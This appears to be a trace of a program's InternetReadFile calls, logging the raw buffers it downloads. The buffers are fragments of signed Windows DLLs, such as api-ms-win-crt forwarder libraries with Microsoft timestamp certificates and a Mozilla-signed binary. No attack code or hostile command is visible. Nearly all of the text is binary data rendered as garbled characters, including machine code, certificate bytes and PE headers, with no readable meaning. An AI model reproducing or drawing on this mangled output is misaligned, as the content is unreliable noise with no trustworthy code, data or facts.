 buffer: ¼›³‘±“]âÿy¡Ѹ5öá‘Ê÷qìýþŠÃàe5Xˤ^–æ§"¯hó>ÏÞ¤ªØî¤â¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž2 Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒÈ0"20180419214648Z20180420214648Z0t0: +„Y 1,0*0 ރŒÈ0³0ž0 ބÞH06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚ÑyÄ £§"?ïk¤££’o ˜x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxòš¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«‡{_gùk‡À¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXƒt¦EV‡‚؈SÑÕù–4¯X¥F¼wÎXä .÷&Yµ`_ | Á¼çØwCC)ôöIZˆ]ײ£ÌíZ÷·ŠËŽ`Øè¡ßUÚ7\„'§oKq¯ÝWóÎu ßÝ×v…ôHd /ʅ![³R±ne”=äŠäžØÀ1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" w ºbæ7•‹dG×öc°¥•ž¼8>O…íf·T70â *†H†÷   1Ò0Ï0Ì0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚/cº¶Ÿcq"ÑéAæ^ìOo¿]¿.¶¶·‡3,ž*"¡Ïuh¤ÓDiÙu…¾¸ÇäÁ˽vr9ɦ½!7¤J÷ŠsøöIȪsÈk/JÊÊ1Åo>¬‘_å"µE!á‹vãàþ†sDs? ʾޜ$сÛÆÇ|*£Órãъ˜Œ}g¼zª\öŽ¶wÒcl q2<‰wȋú¥YæDÜÎí»S½õ»ƒÑĬ”n«…ug\W‡ÛxÊ1ìò´Bˆ¶Ë8ðï‘Éœ•$øâÚ±QwñŒÂäÀâ8ƆfҞĜRÚÍ>Ut–Ý‹yHÑS©˜¸"N5œ4¨œMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELÖùâ#à!    0ä@" ð =
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ï¯"&àÅ~­6jœp‚(࿼Ã!¤@kWWÒðžk- FȧÇGþ„•›{Oœ#å¬þ o/>{Éu»I‹üŽ¸DÝú²çú¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:12E7-3064-61121%0#UMicrosoft Time-Stamp Service¢% 0 +9p%‹ÈyÝ_ ]鋜³”™÷· Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރ‰Ï0"20180419213407Z20180420213407Z0t0: +„Y 1,0*0 ރ‰Ï0á0@0 ބÛO06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚Õ8\ÿ ôBˆ‡-n;“£mmÖ÷ŸÄÐòB½.òxƯ̂¿ùçq²[/f?\ èž=ÅÎC¸»ºÉOTsÀÆ@›Âû¯ ‚=jÎ$ÒÀ§J©µiíèÉ5$ïÞ¥ߨPåõ”Èȟ¼¡eqõÑanáúÒ#J'eý­9ÞܢєàÊQWàv4 N"ؘ6‹ä¾TÞ¸¥gdü¸ÊE܁A Ì]µ1Žùè’¥­Ño“Ú$ók ·®“’ âHKŽ8!ˆ/Ó}ÁH.cK×õˆrWeםÿe¢€½²,þœØå&í@f%4¾íFDJI1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" PÚ9ÎTÑä×õªÉÉ:æ;-Û¹4ç}á³ÈxxÛ0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0tìüe¨i©™¸¶Tÿÿ‹•½øYÂ0  *†H†÷  ‚UŠu/}tøÁ$1z<¯*t :À×d§4ëˆHà˜¿,Þ©ÓÚɟÑмîo`¦’üBؑ& Š!˜¼[:c´A!†d]o¡ªÆ)¬~K‚µÃ<%~*¨ü $ þ™ô‚é&^ë³³˜Vjô|ÔAÀ¶TùøÅa \‰ÉŽ+òÈ}z3Ã:?à]çZ3 ZýPPÓr¨'_?&ÕÛXÏ„E’UrÔ6aÜF_ÞüXv-·y]õiÑþ¢zv½7Y.'€¤ÙQвn'U‚zô”wŠýØóm‡Ó?Y'#H3R"§‡¿šr¸ŒþI)U“4¿’0—ïX%MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL(˜‹ßà!    0V0@ ð
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚–‹Ôù©Ž—ßø(@0)-Ê1vóÔêͬBU^nÌD¹“ÅbÇ9&š]®ŽpeÛHß)tUö®nåú)l— ²“¯•‘XàϸyÛÝÎIånZR†ʯµ>G^v­MÙú¨dËHÝËÓV¥Dš£Ÿ¬9l#QŸ™ZœEö¡éMG=óNê#ÄÀç·à™ õº~³Ðd9ñBˆJS’ɵjYüV/3< =³–Ei/ÝkâRc¬ ÄRƒÿa j47d>L¸ˆÙÞNG¤¿j$Æ-ow7kôp¬©/«”.?—‡Ûk¯Ý}}¿ŸR÷ÕÇ´úðŠ¨¶ï$¼øï"jšæMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELî±üÒà!  .@ P©â@×+@ð4=T.text×,. `.rsrcð@0@@v˜î±üÒ7ddî±üÒ dœœî±üÒRSDS9Öëƒè2éšÐ´R1Eapi-ms-win-crt-math-l1-1-0.pdbd.rdatadœ.rdata$zzzdbg×+.edata@`.rsrc$01`@.rsrc$02î±üÒl::(ø“¬Åßø(@XqŠ¡¹Òê4Mg‚¸Óî = i • Á í !E!o!™!Ã!í!"F"s""Ç"ñ"#E#o#š#º#Ò#î# $)$D$\$s$ˆ$ž$¶$Î$æ$þ$%*%D%`%z%”%­%Ä%Ü%õ%&)&C&]&u&&©&Å&ß&÷& '%'='Q'b's'ˆ'¢'»'Ò'ë'((9(Q(i(…(±(ê(#)[)’)Ë)*;*r*ª*â*+"+=+^+|++ž+°+Ä+Ú+ñ+,,0,G,\,p,…,›,²,Ç,Û,ð,--2-J-c-{--¤-¹-Î-ä-û-.,.D.Z.p.‡.Ÿ.¸.Ð.å.ù./"/6/K/a/x/Ž/¢/µ/É/Þ/ó/ 0 050J0b0{0’0§0»0Ï0ä0ü0151L1^1q1…1š1¯1Å1Ü1ò12242H2]2s2Š2 2
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" Û~T- "Nö@Ùa©ÜKó2{ÌZ•ôhbãó7 ë0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚O0Æn¶XÄ®3uVdõÕ ci¾56m¸m•YÏ«w?vü'z}B¯D¼–„&Ư­ ô’Býšµ«JA¼x¼ÓU]{ËË Ð43¡:ü¾y³ýÊ<ѱª5 ƒ ÔùG·ƒ67‡îƒlDV&þ [<GÌn>~J cm ˜¥¼¹öÔÒÿ T ØmI'.]ò´P¢©ÛÆˁmϬ®lTja@HŠ@z?wçÞ±¢SÆâåÞK½gÜȳüo°ñyu+Û7® \ß6É͎âC±,ÍûÜ﫫욺·!´­^K$#1Äe®³X+YÍÿpšjtÖ8™MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL2¨à!  $@ Pı@ô @ð*=T.text"$ `.rsrcð@&@@v˜2¨<dd2¨ d  2¨RSDS £Nq‘€Í6ð ¹,¿Fîapi-ms-win-crt-multibyte-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgô .edata@`.rsrc$01`@.rsrc$022¨ÈÈ8Xx;`‚¥Èë1Tw›Àã'Lq–¹ÚüBeˆ«Îñ7Z} Ãæ +LmŽ­Êç!>^¤Çê 0 S v ™ ½ â !)!K!l!Ž!±!Ò!ñ!","K"g"‚"Ÿ"¾"à"#*#O#o#Š#¨#É#ê# $-$P$q$$±$Ô$ô$%/%N%m%Š%¥%À%Û%÷%&2&Q&o&Œ&¨&Ã&Þ&ø&'3'R'o'Š'¥'À'Û'ö'(2(Q(p(‘(´(Õ(ô()2)R)
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: Ó5¢çÜâԅ=0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¦ýRà‹'?¦0™·l T=A„Á‰g>Häg0  *†H†÷  ‚®ÏKÊ44âÊ¢‰Y %hÓ쳛ô¨ŽE©¿\’èï ÷µt¼ ‹¾¶³ñ¶ðä£áÃכU®ˆ:ÓRbâeÓ©Š+`ÛõÜéŒÿÜ;Ó Œ´×ˆ‹Q֑~ˆ(ôA`HàK0¢%«~ÞìMB4Î?Øsêô&\¦~Áñxs€ù!Zô·«"ÐÞcwâ¦gKW² cöL3å0밈c»Ïp9?q0Hʨ̵ª^Ã7QªÓE¶µuŸ}èàM¡ü$`öàkIço eÏnŸ¥ŠcïeìQâ[h%‹tì¦Â­ÍbÛx2¡Ðš0—°qÄ#Ƥ‰_ L_Àސf·•bÏL@MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL’œÓÊà!  0 @’Ú@Å0ð=T.textÕ `.rsrcð0@@v˜’œÓÊ:dd’œÓÊ d  ’œÓÊRSDSÝm©q|3í;³/>n5^Èapi-ms-win-crt-runtime-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgÅ.edata0`.rsrc$01`0.rsrc$02’œÓÊfkk8䐎«Íò4Ss”µÖøEgŠ­Ìí )Nn†ŸÈý&Ef·ß'DjªÈè >…ËJn²;a‚²ó2b°ö1YŒÚ C l ™ Ä ê !2!V!Ž!Ç! "P"n"ˆ"¦"Ä"ã"##<#Z#u##¡#½#Ý#ÿ##$D$c$…$©$Ê$ç$%%9%W%p%%¨%Â%ˆÂá )Hgˆ©Êë7\{¢Áà?f–±è:Y|«Ìû=T‰ž¿Úÿg¬ó>_†ç.Qz“ÚXu–Ó"Ir¯ 3 \ … ¶ Û !'!F!o!¶!á!B"g"~"›"º"×"ø"
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer:  Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀ„eâ©0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" }|{4ýàèøî˜Þ³ŸÒ™w$ —U»rSÇ}±^ÿ£0â *†H†÷   1Ò0Ï0Ì0±]:¿V½á)Êrd÷u;x"ëô0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀ„eâ©0 SâdIëO‘ m˼&TÔj0  *†H†÷  ‚( ;£j€›ªˆˆM¦ì$HìSw0¼ÔB?Ín\ÅÔ´¬©Á?Øí§ð,‘ÒØ6OãVp“Q{‚>ӐOX‚Ò§ Är8,ª8¬)› MKz¸Òû–jg›œ`‚ý³ÑÈHÏ©<1Å÷7÷¹V.e3½Å±œ›Íûäo¹¢ ™ÒÉ`½Ð¢ç6Ó²+¢b5I´IE®ÔW(¥×aó—„ 9?uI‹ÎϜß­¸ÊKV{À$ȄiZ Š Ü­%ÝF¦0划¾wS”23óPZÀ‘!§öɆký»[Ù4k9ƒ”_ì ß}Í²Mi|njSIUãh¾MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELì½Gà!  0 @»ˆ@a0ð"=T.texta `.rsrcð0@@v˜ì½G8ddì½G dœœì½GRSDS9uGºlÂk‹‰yˆ‹ìÖapi-ms-win-crt-stdio-l1-1-0.pdbd.rdatadœ.rdata$zzzdbga.edata0`.rsrc$01`0.rsrc$02ì½G^ŸŸ(¤ Ž´Õ<y³ì)h¤à ]˜ÕH…Ä)D^vŽ£·Ëè .Tu—ºÚþ9Z{Àâ 0Qu—¶×û$ G j › Ù !)!C!b!~!›!¹!Ò!ì!""6"P"k"†"Ÿ"¾"ß"ö" #)#E#b#€#–#¬#Ç#ô##$B$[${$$µ$Í$è$ %1%R%l%†%¡%¾%Ý%û%&3&N&f&~&–&¸&Ü&ù&'2'O'l'‡'œ'±'È'Þ'õ' ("(9(O(f(}(
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚7ú¦ÃŽéɏ¹•N)^© òàsßÖF¸Üg ȂôFUa°@î'£„r픕 ð1´ƒj´u°µ¾˜(e7ºÝoŸï-é9VU¶ ù—µrêb”ã^^5ä„|[ø°u†xôéšrvé9gÐèðfªwÃHÉ.Âë§à½ÊÁ1>†Pþx9s¤uå·-øä6º†µ{ÊŸ.kUæw$†á0:òsµ7¶kŠSè Zª/!N툰Òà_LúM'61ðfÉB_ô0 p3¥gtØß¿˜Ì1í¸ÌKwªv~Ìï1F®§1©,„…ýo§¹Ð˜Û²/ž‹â˜ŸpÄöMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELbýMGà!  0 @Pœ@ß0ð"=T.textï `.rsrcð0@@v˜býMG9ddbýMG d  býMGRSDSàå'ÍÓ©”Å‘û! škapi-ms-win-crt-string-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgß.edata0`.rsrc$01`0.rsrc$02býMG,²²8ÈWs¬Êè#Ba€ºÙø<[z™¸Øù;[{œ½Þÿ Abƒ¥Çå<Xr­Ìé!@_~¼Üý9Un‰¤¿Üû 8 U r  ¯ Ð ð !&!C!a!€!!¸!Õ!ô!"2"Q"p""±"Ð"í" #"#=#X#s##¯#Ï#ë#$!$:$S$l$…$ž$º$Ö$ï$%!%:%T%o%Š%¥%À%Û%ö%&,&G&b&}&˜&´&Ð&è&þ&'3'M'd'}'–'®'Æ'ß'ù'()(D(_(x(“(®(Ç(ß(ö()))B)[)v)’)­)Æ)ß)ø)*(*A*[*s*‹*¦*Á*Ú*õ*+)+A+X+q+‹+£+½+Û+Mj…¢¿Þû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ®{ë]ŠƒìårŠ  ¥“>ÔK#ÔÂoHæÂùS˜Ê³¢áá]u€ä3Ô¨_û MÄaÄ<£úÎ̤å1ì¡P¦§ v”Cª/<̃ûþµÎ/¥ÆÈ®¢#ú6ëzfÛ¨“ Öù†ìèW@À¡¡<ډrÅl‰N?çou8/«–'羸¯ÖîÇÜêeÖIÛΌ2@hŠ5[ Tý0ï"mìí;MÆTê-|jŒ "éï)l³ç;7RòÅê”×4&qüÅ´XÆpÖB e\æ0¾²D¹%shח”œ¬aMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELÀ#Šà!    0¸í@½ ð=T.text½  `.rsrcð @@v˜À#Š7ddÀ#Š dœœÀ#ŠRSDSàV¾m‘w:Èd›þ9 |]mapi-ms-win-crt-time-l1-1-0.pdbd.rdatadœ.rdata$zzzdbg½ .edata `.rsrc$01` .rsrc$02À#ŠøHH(Hh =\z˜¹Üü8VsŽ«Èå&Da~›¹Ö÷?bƒ¢Áàÿ!Fk´Õô0Nk‹©ÆâûEe~™µÔõ3Rq¯Îí )D_x«2Qp¬Ïò.Kj… ¿Úù;Vu¯Ìé1Vw˜µÖó7^¨Éê$E` »Úó 5^u«Èé 'He†£Äá<Ur‡¢  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGapi-ms-win-crt-time-l1-1-0.dll_Getdaysucrtbase._Getdays_Getmonthsucrtbase._Getmonths_Gettnamesucrtbase._Gettnames_Strftimeucrtbase._Strftime_W_Getdaysucrtbase._W_Getdays_W_Getmonthsucrtbase._W_Getmonths_W_Gettnamesucrtbase._W_Gettnames_Wcsftimeucrtbase._Wcsftime__dayligh
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚/HõêN¸5lœà}1Ÿô¿pZ±±}ʐ g+ùO1õ ¨1¨€ ÿ±C ÍH‚¸•ÿÜÒÒ[ñOB²¢¼õȆwXüŽPæ`¨<° Þ-yLM¾ƒà]Ñ«dÿ¨•‘‘–¦È•Ã™!úP%ʍÝJ–¤¶èTvNi´cQÝ6ï¼ÉŸä²Ö‰R.H4VW&R‘üûbœQW}/zhoݯŠ/ÇHÍqŠ³V⊺–t¨mâ·çbÆb XW{íR?s~X ܐAܨ\•s¤*ŸÒ €±õ -±ƒaF}N°Ô ¿C+¸ï’üJÜbM”ö#O%¡MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELêËŠà!    0Né@^ ð =T.textn `.rsrcð @@v˜êËŠ:ddêËŠ d  êËŠRSDSR”dYßDïüëëF»œapi-ms-win-crt-utility-l1-1-0.pdbd.rdatad¬.rdata$zzzdbg^.edata `.rsrc$01` .rsrc$02êËŠd8°(®Ø#<Ul…¢¼Óê+@[r‡ ¶ÉÝò4I_†Èñ3Ne|—¶Ëäù'8Qn˜±Ä×ì/BY api-ms-win-crt-utility-l1-1-0.dll_abs64ucrtbase._abs64_byteswap_uint64ucrtbase._byteswap_uint64_byteswap_ulongucrtbase._byteswap_ulong_byteswap_ushortucrtbase._byteswap_ushort_lfinducrtbase._lfind_lfind_sucrtbase._lfind_s_lrotlucrtbase._lrotl_lrotrucrtbase._lrotr_lsearchucrtbase._lsearch_lsearch_sucrtbase._lsearch_s_rotlucrtbase._rotl_rotl64ucrtbase._rotl64_rotrucrtbase._rotr_rotr64ucrtbase._rotr6
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" È÷ ^OëCšÔÚߧMcO ,šl/ââÉ‘äãb0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚±[‘”4êª*ï"ØÞnƨ:é'ŸÛпÅÚü7Ùۃ}ـ¢±¤!öÙ¿T®~&XºØ½eW\Øÿ’Æ2P9Ùòïý¾ §-àÅ1#ڜÁ­ÙÔP‚WãùTÁŠ¢€ñÁ„ g ìŠÜ"{…¼5;†Ð3~þx7³y«4÷Þ×Ê!†T{&þÛ»õniøZOÿð&ÚHR“P; ʪދ @Ê噎bEًö R+Š™ ±ÇøCµBÔȐ5 R›e•“H©d°ÛðMIÙ´¨ð”¢rË|ªå(@™m×d÷ v ˆÎR;’…I¾« (€Å!-o¯À»ù£ÍMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9î¯`à"! ¨:p¬@—6@Aµ>´Iiˆ|ð¨æ¸=Ü6,â8À  Ž$Ü=`.textö§¨ `.rdatatìÀî¬@@.data´°š@À.00cfgО@@.tlsà @À.rsrc¨ð¢@@.reloc=>¨@BU‰å‹MÐ]ÃÌÌÌÌÌU‰åSWVœX‰Á5 PœXº9Átº…Ò„¸1À1ÿ¢…À„ª‰Æ1À1É@¢‰ÈÁê$€â¢U¶‰ÈˆT¶Áè $þ€¢V¶ƒ ‰øº‰Ï¢W¶‰ÈÁè$¢X¶‰È!ÑÁè$9Ñ¢Y¶…‹1ÉЃà1ۃø”Z¶ƒþrƒøu¸1É¢Àë€ã‰øˆ[¶Áè$¢\¶^_[]Ã1À¢T¶¢U¶¢V¶¢W¶¢
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ÁÖÈ\Aÿy_PT¡†–º­Å 9¸rŽP*Ò_K3°K¥Þå5яû’A±Aú/w¢Æ´ø͚/P Þý)Z}Ràû§«/FvÚWúǁHŽ »Ëã+ƒ,</5»GêWrøb]pî0¯BïNxöôŸÉhi }³÷MÍ TO¬­Š»/€ÈæãǑð¦#O~…âh·kÚG¯…žëÚlX×â{j5xêÀ¶`FåùàMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELMî¯`à"! B°?°ìò@A석ô!T pT¸°¸ÿta`  'X.text®AB `.rdatatÜ`ÞF@@.dataÌL@*$@À.00cfgN@@.rsrcp P@@.reloc¸ÿ°T@BU‰åSWV‹}ƒÿ r*hNhëTh¥<h/djèCƒÄ¾‰ð^_[]øy¾èl¹o‹U£øB΋…Ût‹ p@‰ÖÿSÿщòƒÄ‹½”l‹M 1ö…Ò‰q‰‹ ½¼l‹}‰‰wt ‹M‰¼l…Ût“‹ x@ÿSÿуÄé|ÿÿÿÌÌÌÌÌÌÌÌÌÌÌU‰åƒ}t‹ p@ÿ]ÿá]ÃÌÌÌÌÌÌU‰åƒ}t‹ x@ÿ]ÿá]ÃÌÌÌÌÌÌU‰åWVƒäøƒì‹@‹M‹Et$‰ç1ê‰T$1҉V‰‰W‰QWVPèÈþÿÿƒÄ‰Æ…Àu‹M ‹T$‹E‰‹ $‰‹L$1éè6‰ðeø^_]ÃÌÌÌÌÌÌÌÌÌÌU‰åSWVƒì¡@‹M‹} 1è‰Eð‹q …öt‹ p@ÿVÿыMƒÄƒÿ ‡&‹U‹Eÿ$½ Çlj֋U‹„¹‰‰ø1ÿ…ö„yDŽéi€y[u ‹Mè÷½‹M‹A1ÿ…ÀŽ¥º1ö‹I‹ …É„‹‹A‰Mà‰U؉}ä‹·ƒŒ‹‹˜‹“ԍD<‹ œ@‹z,‰EÜÿWÿуĉNj L@¯}ÜÿSÿуÄø‹M ƒ˜ƒù u ‹Mà™‹I÷yD‹}ä‹M‹UØNjAFƒÂ9ÆŒiÿÿÿë‹Mëí€y[u ‹M脽‹M‹E‹U‰8Ç1ÿé€1ÿGéxÇEì€y[u ‹Mèÿ¼‹ME쉁øƒyŽ81ÿ‹A‰ùÁá‹\ ‹M…Û„‹ P@ÿjÿуÄ‹K,1ÒK KK<¯È¸Mì‰Mì‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ‚7 10¡€https://mozilla.org0  *†H†÷ ‚mˆÒ@*C(ÈҚ>v»ÛãL!©¦Çï@Œ(×±$AU$³pÕ4Wƒ²ØV̙°¼Uê¨î—¶E5_ a­Æä²È¡Â}ð.€ÇŸ| \–%»·,''§»beˆP:¤VEeø?Æ;?èš{ôgÍì,C<rÁ՛8´è°Ø[Ù»= k\4r§³¤Ž0s"ÄéÕ®€PseS­8ïó[ s~p—Kv$,õþp „4HEk<ùY0ûœ‹¹ ö@n#&òÄ٘¥Z͋BNªº´Ô§ 5¤U¤>&;Ì°7ð”$ò;Óem}•â¶-߈QïR{·0µ(x(š´ÉÒîǓ*ѧÞMOx6ä Rò ‘ò© 27ãNHMϯæ·`ºáא.ùО_;q¿Bf9* @kÏ©”±di£°i¿»‹‰Äz ¹lÓèÜ©Ž5Î V2ìÕ¼ü{e³ z­/öP!šEHë’ËÕã3I²«g6õž¢®ÒiT…_m‡Ÿ ñ?Ep0/n[ÝÚÃZ:W¯«{Š£¿2ÒÀæ”*úìÈÙ.™i¶³Æ›z)k¹é<YÐG,OÒV#¹{…¥Ó jî(œñ’r†ÈAÞ}¥¯ìð¾ÇPt\ë·Gø¼=+‡d¹:2Wc­Àx¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" Ååuš`²€ºò³$‹ÍÌt?yÉ‹©L3Ջ×ø2c0  *†H†÷ ‚¦ÑÔvžX÷¼V©úÿ™ö¶½ÞMLµªUu–˜>A:•fU-(H¬$86Ö¬ÊH »¸@›ú2€jq “æªÄ½«âN傊‹<98ä-­j$xÙßísWêĖùŒ¬ŒÃ s:)Œ¯Ü(BàÑ÷I“n…ÄÙ¤ÒúA ðèM;e˜¢Q_Mڌ%íHôœN’¹·§Sk͸%¢ßE휾¹öÕw%ÿsYÐËÏ免õ=²žâ)9ÎíØ2;qÅ*`iòY»–8-`;mɼã9©­^kZðlïÔM.z.i«¡Êx‹ÛÒ8ÕôµºŒ3»,–ÁtMZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ºùå¬þ˜‹ÿþ˜‹ÿþ˜‹ÿJdÿü˜‹ÿ÷àÿõ˜‹ÿþ˜Šÿ֘‹ÿvÿþñ˜‹ÿvÿˆþ혋ÿvÿŽþû˜‹ÿvÿƒþ嘋ÿvÿ‹þÿ˜‹ÿvÿtÿÿ˜‹ÿvÿ‰þÿ˜‹ÿRichþ˜‹ÿPEL ú>[à"! æ P® @¡8@A°ë ¸Œ @?0¸  8È @´.textÄäæ `.dataê@À.idata„ì@@.rsrc ò@@.reloc¸ 0 ø@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: hington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" o•3JÇK€5¼’€2ïļ?ֆ"E$E:ë_0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0 ½¿iäýø—_Vòí¥oŒøÜk0  *†H†÷  ‚YÕvT3¸e[Ö³HÄر C•DK›±…*ùÁo¢ì‹íEÔ¥ßÑrƒzàa7Dh Z¨ã§’Õ`6ŒØÚþ't¸WþV@½6B5 ëÚ4\RJ—5`««»‡„{þy´Šgè48ÕpNÙ݅wÇ@‘b¨ZŽ MQ¦Î—jŽŸëº¼!Ø0 žÐN_?%Š-È 1³‡"e™Ü·’yÝ@&ºð}$Þt®$–ÈJ¢2Hûg„!‘è“ÂZw@hÕÍ"´JŪ¥ýùçß" X#®eâx*ÜÇï÷ó@?³×3OòÍL¶jΰÔ<xe0MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELxî¯`à"! ä20é° êå @A ú S_ú Èp p ¸€  #dô  hü @.textOãä `.rdataŒè@@.data0F î @À.00cfg` ð @@.rsrcpp ò @@.reloc #€ $ö @BU‰åhOè²âƒÄ…Àt‰€8ƒÀƒàð]Ãhàÿÿè‡âƒÄ1À]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‰åWV‹E…Àt‹}‹u‹U‹M 